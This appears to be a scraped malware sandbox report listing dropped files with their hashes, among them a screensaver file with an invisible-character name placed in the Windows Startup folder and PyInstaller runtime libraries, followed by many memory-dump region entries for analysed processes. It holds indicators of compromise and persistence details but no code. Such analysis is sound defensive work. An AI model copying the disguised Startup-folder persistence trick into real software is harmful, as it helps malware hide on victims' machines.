\??\c:\programdata\microsoft\windows\start menu\programs\startup\ ‎‌‏ .scr

Filesize
196KB

MD5
1ed9597416168e81f73a6a77e1564d56

SHA1
e4e616e819efbdf3d048452d07de393e3ecd12f9

SHA256
4104a9cb5ebb1258e10880e5078194922e43b717363c84b42146148deb321ebb

SHA512
606224235279aefc1c08321ac279b692f76876394f4ee4fcd53a65a160e52f3f3ff827f7c006810218c36bfb5d0a92e60c9a11e671fa574c29fba48f9088965b

Download Submit
\Users\Admin\AppData\Local\Temp\_MEI48002\VCRUNTIME140.dll

Filesize
96KB

MD5
f12681a472b9dd04a812e16096514974

SHA1
6fd102eb3e0b0e6eef08118d71f28702d1a9067c

SHA256
d66c3b47091ceb3f8d3cc165a43d285ae919211a0c0fcb74491ee574d8d464f8

SHA512
7d3accbf84de73fb0c5c0de812a9ed600d39cd7ed0f99527ca86a57ce63f48765a370e913e3a46ffc2ccd48ee07d823dafdd157710eef9e7cc1eb7505dc323a2

Download Submit
\Users\Admin\AppData\Local\Temp\_MEI48002\_ctypes.pyd

Filesize
57KB

MD5
38fb83bd4febed211bd25e19e1cae555

SHA1
4541df6b69d0d52687edb12a878ae2cd44f82db6

SHA256
cd31af70cbcfe81b01a75ebeb2de86079f4cbe767b75c3b5799ef8b9f0392d65

SHA512
f703b231b675c45accb1f05cd34319b5b3b7583d85bf2d54194f9e7c704fbcd82ef2a2cd286e6a50234f02c43616fbeccfd635aefd73424c1834f5dca52c0931

Download Submit
\Users\Admin\AppData\Local\Temp\_MEI48002\libcrypto-1_1.dll

Filesize
235KB

MD5
cd3f353ab9955173dd834eb8e7fdb7a2

SHA1
471bec4c75e21f5f54603a9cee20e5105d880b64

SHA256
09170aceeb34f2affab0342d6d8cf95dccae3c1a5e5b8a87bffb4d12b9263098

SHA512
aa6667f5024603739b5b64d0e5fcad233f2c5c3eb6463c8274e22a4594403d6697be6bfd9976055cc03a94cb003c154cf7e344a1db311b514077884ea5804657

Download Submit
\Users\Admin\AppData\Local\Temp\_MEI48002\libcrypto-1_1.dll

Filesize
322KB

MD5
ec06b69183e0adb873cd36732576608b

SHA1
195e7c2722325abfc2e3366b49605bcadbbf98a7

SHA256
d67ac0946e238966fb27bb8f5a7105a966b1fdb4e6e1bac897608c2d738c506d

SHA512
fa37ceea036e4a40b7259a0710e5398cf00ece5e6e56a027c764be64f71a488c3258d33123c9b54a9a287393032332aae34e89ee83ba601e17c23770694504ff

Download Submit
\Users\Admin\AppData\Local\Temp\_MEI48002\libffi-8.dll

Filesize
24KB

MD5
90a6b0264a81bb8436419517c9c232fa

SHA1
17b1047158287eb6471416c5df262b50d6fe1aed

SHA256
5c4a0d4910987a38a3cd31eae5f1c909029f7762d1a5faf4a2e2a7e9b1abab79

SHA512
1988dd58d291ee04ebfec89836bb14fcaafb9d1d71a93e57bd06fe592feace96cdde6fcce46ff8747339659a9a44cdd6cf6ac57ff495d0c15375221bf9b1666e

Download Submit
\Users\Admin\AppData\Local\Temp\_MEI48002\libssl-1_1.dll

Filesize
203KB

MD5
eac369b3fde5c6e8955bd0b8e31d0830

SHA1
4bf77158c18fe3a290e44abd2ac1834675de66b4

SHA256
60771fb23ee37b4414d364e6477490324f142a907308a691f3dd88dc25e38d6c

SHA512
c51f05d26fda5e995fe6763877d4fcdb89cd92ef2d6ee997e49cc1ee7a77146669d26ec00ad76f940ef55adae82921dede42e55f51bd10d1283ecfe7c5009778

Download Submit
\Users\Admin\AppData\Local\Temp\_MEI48002\python311.dll

Filesize
434KB

MD5
e89a01bc940242fc21779889e2d7f989

SHA1
b59b75bd00846b2491001ecbc7b257acf5a8dd11

SHA256
a16cd2ad58ab61c4e15567f7cf29b6a1fc0175546ebde53f5ea01e87b170e86d

SHA512
3b978ce39fa9a1d91300d327e809c6aabe55a2fe01399e9494c8abfe76a8c3c2d751a5f6210c1dc776298c304c88380f618e380264c18fb7308e6b7379f1cd61

Download Submit
\Users\Admin\AppData\Local\Temp\_MEI48002\sqlite3.dll

Filesize
384KB

MD5
95d38e9c9c5a384930e9d9d0cff3a054

SHA1
604f8e0fdae0d2ed58f20c01b53cd0e3dcf0b0e9

SHA256
d64a3e89b6ae7dd6c7d3580fa54402aab944f671c8dc8936ad01f9bfb1ae77be

SHA512
b00c294deff91323780b4a0ce217ec973eed6c56c03b304e43028a2584906696e811c33e17ef3e4d429d26f30f4d21ceb4a24ce9e04c6d08a2cf697325865c33

Download Submit
\Users\Admin\AppData\Local\Temp\_MEI48002\unicodedata.pyd

Filesize
123KB

MD5
ecc137cb881439fb111e7c74bc3ba99e

SHA1
be10e226b22aaff3e4557642318db8526bb48ffa

SHA256
96f0833c8fb65dfa3f706c7a783ae5f56970a99f703d8327396bb2d2447b9efc

SHA512
3db215671cdd51837355a454e630c4629f999e47359719bea2562f3d30e6bceb0e80223e581cad3b5a76dcfa6f3bc754f649228351e559458772a57b6ef5f0bf

Download Submit
memory/1248-113-0x000001DBCC6E0000-0x000001DBCC6E1000-memory.dmp

Filesize
4KB

Download
memory/1248-114-0x000001DBCC6F0000-0x000001DBCC6F1000-memory.dmp

Filesize
4KB

Download
memory/1248-0-0x000001DBC5620000-0x000001DBC5630000-memory.dmp

Filesize
64KB

Download
memory/1248-35-0x000001DBC57E0000-0x000001DBC57E2000-memory.dmp

Filesize
8KB

Download
memory/1248-16-0x000001DBC5B00000-0x000001DBC5B10000-memory.dmp

Filesize
64KB

Download
memory/2548-285-0x00007FFCBA320000-0x00007FFCBA339000-memory.dmp

Filesize
100KB

Download
memory/2548-212-0x00007FFCB9BD0000-0x00007FFCBA1B8000-memory.dmp

Filesize
5.9MB

Download
memory/2548-167-0x00007FFCB9BD0000-0x00007FFCBA1B8000-memory.dmp

Filesize
5.9MB

Download
memory/2548-190-0x00007FFCC93B0000-0x00007FFCC93BF000-memory.dmp

Filesize
60KB

Download
memory/2548-660-0x00007FFCB9BD0000-0x00007FFCBA1B8000-memory.dmp

Filesize
5.9MB

Download
memory/2548-666-0x00007FFCB9A50000-0x00007FFCB9BC3000-memory.dmp

Filesize
1.4MB

Download
memory/2548-661-0x00007FFCBA3A0000-0x00007FFCBA3C4000-memory.dmp

Filesize
144KB

Download
memory/2548-172-0x00007FFCBA3A0000-0x00007FFCBA3C4000-memory.dmp

Filesize
144KB

Download
memory/2548-196-0x00007FFCBA370000-0x00007FFCBA39D000-memory.dmp

Filesize
180KB

Download
memory/2548-198-0x00007FFCBA490000-0x00007FFCBA4A9000-memory.dmp

Filesize
100KB

Download
memory/2548-200-0x00007FFCBA340000-0x00007FFCBA363000-memory.dmp

Filesize
140KB

Download
memory/2548-202-0x00007FFCB9A50000-0x00007FFCB9BC3000-memory.dmp

Filesize
1.4MB

Download
memory/2548-204-0x00007FFCBA320000-0x00007FFCBA339000-memory.dmp

Filesize
100KB

Download
memory/2548-208-0x00007FFCBA2F0000-0x00007FFCBA31E000-memory.dmp

Filesize
184KB

Download
memory/2548-207-0x00007FFCC8C00000-0x00007FFCC8C0D000-memory.dmp

Filesize
52KB

Download
memory/2548-213-0x00007FFCBA3A0000-0x00007FFCBA3C4000-memory.dmp

Filesize
144KB

Download
memory/2548-268-0x00007FFCB9A50000-0x00007FFCB9BC3000-memory.dmp

Filesize
1.4MB

Download
memory/2548-401-0x00007FFCBA2F0000-0x00007FFCBA31E000-memory.dmp

Filesize
184KB

Download
memory/2548-406-0x00007FFCB96D0000-0x00007FFCB9A45000-memory.dmp

Filesize
3.5MB

Download
memory/2548-214-0x00007FFCBA230000-0x00007FFCBA2E8000-memory.dmp

Filesize
736KB

Download
memory/2548-418-0x00007FFCBA230000-0x00007FFCBA2E8000-memory.dmp

Filesize
736KB

Download
memory/2548-421-0x000001DABA2E0000-0x000001DABA655000-memory.dmp

Filesize
3.5MB

Download
memory/2548-424-0x00007FFCB9BD0000-0x00007FFCBA1B8000-memory.dmp

Filesize
5.9MB

Download
memory/2548-432-0x00007FFCBA3A0000-0x00007FFCBA3C4000-memory.dmp

Filesize
144KB

Download
memory/2548-215-0x00007FFCB96D0000-0x00007FFCB9A45000-memory.dmp

Filesize
3.5MB

Download
memory/2548-218-0x000001DABA2E0000-0x000001DABA655000-memory.dmp

Filesize
3.5MB

Download
memory/2548-499-0x00007FFCB9550000-0x00007FFCB966C000-memory.dmp

Filesize
1.1MB

Download
memory/2548-222-0x00007FFCC7450000-0x00007FFCC745D000-memory.dmp

Filesize
52KB

Download
memory/2548-224-0x00007FFCBA210000-0x00007FFCBA224000-memory.dmp

Filesize
80KB

Download
memory/2548-226-0x00007FFCB9550000-0x00007FFCB966C000-memory.dmp

Filesize
1.1MB

Download
memory/2548-266-0x00007FFCBA340000-0x00007FFCBA363000-memory.dmp

Filesize
140KB

Download
memory/3060-525-0x000002CA91AD0000-0x000002CA91AE0000-memory.dmp

Filesize
64KB

Download
memory/3060-527-0x000002CA91AD0000-0x000002CA91AE0000-memory.dmp

Filesize
64KB

Download
memory/3060-524-0x00007FFCB8990000-0x00007FFCB937C000-memory.dmp

Filesize
9.9MB

Download
memory/3060-289-0x000002CAAA180000-0x000002CAAA1A2000-memory.dmp

Filesize
136KB

Download
memory/3060-542-0x000002CA91AD0000-0x000002CA91AE0000-memory.dmp

Filesize
64KB

Download
memory/3060-274-0x000002CA91AD0000-0x000002CA91AE0000-memory.dmp

Filesize
64KB

Download
memory/3060-301-0x000002CAAA330000-0x000002CAAA3A6000-memory.dmp

Filesize
472KB

Download
memory/3060-271-0x000002CA91AD0000-0x000002CA91AE0000-memory.dmp

Filesize
64KB

Download
memory/3060-337-0x000002CA91AD0000-0x000002CA91AE0000-memory.dmp

Filesize
64KB

Download
memory/3060-264-0x00007FFCB8990000-0x00007FFCB937C000-memory.dmp

Filesize
9.9MB

Download
memory/3060-554-0x00007FFCB8990000-0x00007FFCB937C000-memory.dmp

Filesize
9.9MB

Download
memory/3284-550-0x00000251CCF20000-0x00000251CCF30000-memory.dmp

Filesize
64KB

Download
memory/3284-548-0x00000251CCF20000-0x00000251CCF30000-memory.dmp

Filesize
64KB

Download
memory/3284-293-0x00000251CCF20000-0x00000251CCF30000-memory.dmp

Filesize
64KB

Download
memory/3284-288-0x00007FFCB8990000-0x00007FFCB937C000-memory.dmp

Filesize
9.9MB

Download
memory/3284-563-0x00007FFCB8990000-0x00007FFCB937C000-memory.dmp

Filesize
9.9MB

Download
memory/3284-546-0x00007FFCB8990000-0x00007FFCB937C000-memory.dmp

Filesize
9.9MB

Download
memory/3284-549-0x00000251CCF20000-0x00000251CCF30000-memory.dmp

Filesize
64KB

Download
memory/3284-411-0x00000251CCF20000-0x00000251CCF30000-memory.dmp

Filesize
64KB

Download
memory/3428-54-0x000001724CDD0000-0x000001724CDD2000-memory.dmp

Filesize
8KB

Download
memory/3428-60-0x000001725D1D0000-0x000001725D1D2000-memory.dmp

Filesize
8KB

Download
memory/3428-58-0x000001725D1B0000-0x000001725D1B2000-memory.dmp

Filesize
8KB

Download
memory/3856-609-0x0000020A2F240000-0x0000020A2F250000-memory.dmp

Filesize
64KB

Download
memory/3856-584-0x00007FFCB8990000-0x00007FFCB937C000-memory.dmp

Filesize
9.9MB

Download
memory/3856-587-0x0000020A2F240000-0x0000020A2F250000-memory.dmp

Filesize
64KB

Download
memory/3856-585-0x0000020A2F240000-0x0000020A2F250000-memory.dmp

Filesize
64KB

Download
memory/5072-282-0x00007FFCB8990000-0x00007FFCB937C000-memory.dmp

Filesize
9.9MB

Download
memory/5072-292-0x000001C9D3240000-0x000001C9D3250000-memory.dmp

Filesize
64KB

Download
memory/5072-526-0x000001C9D3240000-0x000001C9D3250000-memory.dmp

Filesize
64KB

Download
memory/5072-539-0x00007FFCB8990000-0x00007FFCB937C000-memory.dmp

Filesize
9.9MB

Download
memory/5072-291-0x000001C9D3240000-0x000001C9D3250000-memory.dmp

Filesize
64KB

Download
memory/5072-522-0x000001C9D3240000-0x000001C9D3250000-memory.dmp

Filesize
64KB

Download
memory/5128-547-0x00007FFCB8990000-0x00007FFCB937C000-memory.dmp

Filesize
9.9MB

Download
memory/5128-290-0x00007FFCB8990000-0x00007FFCB937C000-memory.dmp

Filesize
9.9MB

Download
memory/5128-296-0x000001DA739E0000-0x000001DA739F0000-memory.dmp

Filesize
64KB

Download
memory/5128-503-0x000001DA739E0000-0x000001DA739F0000-memory.dmp

Filesize
64KB

Download
memory/5128-562-0x00007FFCB8990000-0x00007FFCB937C000-memory.dmp

Filesize
9.9MB

Download
memory/5128-543-0x000001DA739E0000-0x000001DA739F0000-memory.dmp

Filesize
64KB

Download
memory/5192-294-0x000001F93BFD0000-0x000001F93BFE0000-memory.dmp

Filesize
64KB

Download
memory/5192-295-0x00007FFCB8990000-0x00007FFCB937C000-memory.dmp

Filesize
9.9MB

Download
memory/5192-297-0x000001F93BFD0000-0x000001F93BFE0000-memory.dmp

Filesize
64KB

Download
memory/5192-445-0x00007FFCB8990000-0x00007FFCB937C000-memory.dmp

Filesize
9.9MB

Download